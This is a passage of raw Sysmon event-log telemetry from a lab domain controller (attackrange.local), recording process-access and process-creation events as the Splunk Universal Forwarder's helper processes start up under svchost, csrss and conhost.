16:15:07.980{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.980{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.980{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-570B-6008-1D07-00000000A301}1784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.980{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-570B-6008-1D07-00000000A301}1784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.981{7901BC46-570B-6008-1D07-00000000A301}1784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.308{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-570B-6008-1C07-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.308{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.308{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.308{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031408Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.308{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031407Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.308{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-570B-6008-1C07-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031406Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.308{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-570B-6008-1C07-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031405Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.309{7901BC46-570B-6008-1C07-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.480{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-570C-6008-1E07-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.480{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.480{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.480{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.480{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.480{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-570C-6008-1E07-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.480{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-570C-6008-1E07-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.481{7901BC46-570C-6008-1E07-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:08.121{7901BC46-570B-6008-1D07-00000000A301}17847372C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.542{7901BC46-570D-6008-1F07-00000000A301}72005528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-570D-6008-1F07-00000000A301}7200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:09.402{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-570D-6008-1F07-00000000A301}7200C:\Program 